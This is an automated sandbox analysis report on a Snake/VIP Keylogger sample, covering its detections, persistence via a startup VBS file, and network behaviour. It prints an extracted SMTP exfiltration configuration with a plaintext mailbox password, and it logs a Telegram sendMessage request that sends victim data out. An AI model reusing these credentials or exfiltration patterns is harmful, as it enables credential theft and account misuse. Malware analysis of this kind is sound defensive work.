Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RubzLi27lr.exe

Overview

General Information

Sample name:RubzLi27lr.exe
renamed because original name is a hash value
Original sample name:eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8.exe
Analysis ID:1587901
MD5:44f0ea32a5acf017acf1d2a595c615f1
SHA1:ef36981f3271cf8c1a4b16a86b3d5f232337bb93
SHA256:eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RubzLi27lr.exe (PID: 1524 cmdline: "C:\Users\user\Desktop\RubzLi27lr.exe" MD5: 44F0EA32A5ACF017ACF1D2A595C615F1)
    • spadixes.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\RubzLi27lr.exe" MD5: 44F0EA32A5ACF017ACF1D2A595C615F1)
      • RegSvcs.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\RubzLi27lr.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4232 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • spadixes.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" MD5: 44F0EA32A5ACF017ACF1D2A595C615F1)
      • RegSvcs.exe (PID: 2136 cmdline: "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e13a:$a1: get_encryptedPassword
          • 0x2e457:$a2: get_encryptedUsername
          • 0x2df4a:$a3: get_timePasswordChanged
          • 0x2e053:$a4: get_passwordField
          • 0x2e150:$a5: set_encryptedPassword
          • 0x2f80a:$a7: get_logins
          • 0x2f76d:$a10: KeyLoggerEventArgs
          • 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 29 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            3.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x2e13a:$a1: get_encryptedPassword
            • 0x2e457:$a2: get_encryptedUsername
            • 0x2df4a:$a3: get_timePasswordChanged
            • 0x2e053:$a4: get_passwordField
            • 0x2e150:$a5: set_encryptedPassword
            • 0x2f80a:$a7: get_logins
            • 0x2f76d:$a10: KeyLoggerEventArgs
            • 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
            3.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x2ed7f:$s1: UnHook
            • 0x2ed86:$s2: SetHook
            • 0x2ed8e:$s3: CallNextHook
            • 0x2ed9b:$s4: _hook
            8.2.spadixes.exe.3fd0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.spadixes.exe.3fd0000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                Click to see the 24 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , ProcessId: 4232, ProcessName: wscript.exe
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 3.130.71.34, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6108, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49871
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , ProcessId: 4232, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe, ProcessId: 6568, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:10:47.478879+010028033053Unknown Traffic192.168.2.649718104.21.16.1443TCP
                2025-01-10T19:10:51.087271+010028033053Unknown Traffic192.168.2.649742104.21.16.1443TCP
                2025-01-10T19:10:53.368242+010028033053Unknown Traffic192.168.2.649760104.21.16.1443TCP
                2025-01-10T19:10:57.116679+010028033053Unknown Traffic192.168.2.649788104.21.16.1443TCP
                2025-01-10T19:10:59.642439+010028033053Unknown Traffic192.168.2.649808104.21.16.1443TCP
                2025-01-10T19:11:02.891207+010028033053Unknown Traffic192.168.2.649833104.21.16.1443TCP
                2025-01-10T19:11:04.124384+010028033053Unknown Traffic192.168.2.649844104.21.16.1443TCP
                2025-01-10T19:11:07.926395+010028033053Unknown Traffic192.168.2.649876104.21.16.1443TCP
                2025-01-10T19:11:10.509150+010028033053Unknown Traffic192.168.2.649896104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:10:45.694316+010028032742Potentially Bad Traffic192.168.2.649710193.122.6.16880TCP
                2025-01-10T19:10:46.897347+010028032742Potentially Bad Traffic192.168.2.649710193.122.6.16880TCP
                2025-01-10T19:10:49.225489+010028032742Potentially Bad Traffic192.168.2.649719193.122.6.16880TCP
                2025-01-10T19:10:50.491230+010028032742Potentially Bad Traffic192.168.2.649736193.122.6.16880TCP
                2025-01-10T19:11:01.459977+010028032742Potentially Bad Traffic192.168.2.649820193.122.6.16880TCP
                2025-01-10T19:11:02.319252+010028032742Potentially Bad Traffic192.168.2.649820193.122.6.16880TCP
                2025-01-10T19:11:03.584907+010028032742Potentially Bad Traffic192.168.2.649838193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:11:00.597825+010018100071Potentially Bad Traffic192.168.2.649814149.154.167.220443TCP
                2025-01-10T19:11:12.687611+010018100071Potentially Bad Traffic192.168.2.649913149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: RubzLi27lr.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://mail.acadental.comAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeAvira: detection malicious, Label: HEUR/AGEN.1319493
                Found malware configuration
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
                Source: 8.2.spadixes.exe.3fd0000.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeReversingLabs: Detection: 68%
                Multi AV Scanner detection for submitted file
                Source: RubzLi27lr.exeVirustotal: Detection: 68%Perma Link
                Source: RubzLi27lr.exeReversingLabs: Detection: 68%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: RubzLi27lr.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: RubzLi27lr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49712 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49826 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49814 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49913 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B1DBBE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AEC2A2 FindFirstFileExW,0_2_00AEC2A2
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B268EE FindFirstFileW,FindClose,0_2_00B268EE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B2698F
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B1D076
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B1D3A9
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B29642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B29642
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B2979D
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B29B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B29B2B
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B25C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B25C97
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0094DBBE
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0091C2A2 FindFirstFileExW,2_2_0091C2A2
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009568EE FindFirstFileW,FindClose,2_2_009568EE
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0095698F
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0094D076
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0094D3A9
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00959642
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0095979D
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00959B2B
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00955C97
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 029DF45Dh3_2_029DF2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 029DF45Dh3_2_029DF4AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 029DF45Dh3_2_029DF52F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 029DFC19h3_2_029DF961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FE959h3_2_064FE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064F31E0h3_2_064F2DC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064F0D0Dh3_2_064F0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064F1697h3_2_064F0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064F2C19h3_2_064F2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_064F0673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FE0A9h3_2_064FDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FF209h3_2_064FEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FCF49h3_2_064FCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FD7F9h3_2_064FD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064F31E0h3_2_064F2DB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FE501h3_2_064FE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FEDB1h3_2_064FEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FF661h3_2_064FF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_064F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_064F0853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FFAB9h3_2_064FF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FD3A1h3_2_064FD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064F31E0h3_2_064F310E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 064FDC51h3_2_064FD9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0158F45Dh9_2_0158F2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0158F45Dh9_2_0158F4AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0158FC19h9_2_0158F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9E501h9_2_06A9E258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A90D0Dh9_2_06A90B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A91697h9_2_06A90B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A931E0h9_2_06A92DC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A92C19h9_2_06A92968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9E959h9_2_06A9E6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9E0A9h9_2_06A9DE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9F661h9_2_06A9F3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9EDB1h9_2_06A9EB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9F209h9_2_06A9EF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9CF49h9_2_06A9CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9D3A1h9_2_06A9D0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9FAB9h9_2_06A9F810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06A90040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9DC51h9_2_06A9D9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A931E0h9_2_06A92DC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A931E0h9_2_06A9310E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06A9D7F9h9_2_06A9D550

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49814 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49913 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.6:49871 -> 3.130.71.34:587
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
